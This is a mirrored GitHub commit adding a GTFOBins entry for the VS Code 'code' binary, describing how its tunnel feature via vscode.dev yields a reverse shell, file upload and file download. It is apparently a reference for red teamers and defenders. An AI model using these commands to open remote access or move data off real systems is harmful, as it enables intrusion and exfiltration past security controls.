1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-07 16:21:32 +01:00

Merge 70d0ff6a74cd3850aaa6cacc63283ca347ca7b86 into b29f2cfde1c72e4ea5191e49604e923bbda98461

This commit is contained in:
vhash 2025-10-04 16:18:12 +02:00 committed by GitHub
commit aa6aa46159
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

23
_gtfobins/code.md Normal file

@ -0,0 +1,23 @@
---
functions:
reverse-shell:
- description: |
Create a tunnel to `vscode.dev`, then complete Github device registration and browse `https://vscode.dev/tunnel/my-tunnel-name`.
Select `View \ Terminal` to spawn a shell on remote.
code: code tunnel -name 'my-tunnel-name'
file-upload:
- description: |
Create a tunnel to `vscode.dev`, then complete Github device registration and browse `https://vscode.dev/tunnel/my-tunnel-name`.
In the `Explorer` tab, select `Open Folder`, then right-click on the folder and select `Upload`.
Select file from the local file browser.
code: code tunnel -name 'my-tunnel-name'
file-download:
- description: |
Create a tunnel to `vscode.dev`, then complete Github device registration and browse `https://vscode.dev/tunnel/my-tunnel-name`.
In the `Explorer` tab, select `Open Folder`, then select a file, right-click and select `Download`.
code: code tunnel -name 'my-tunnel-name'
---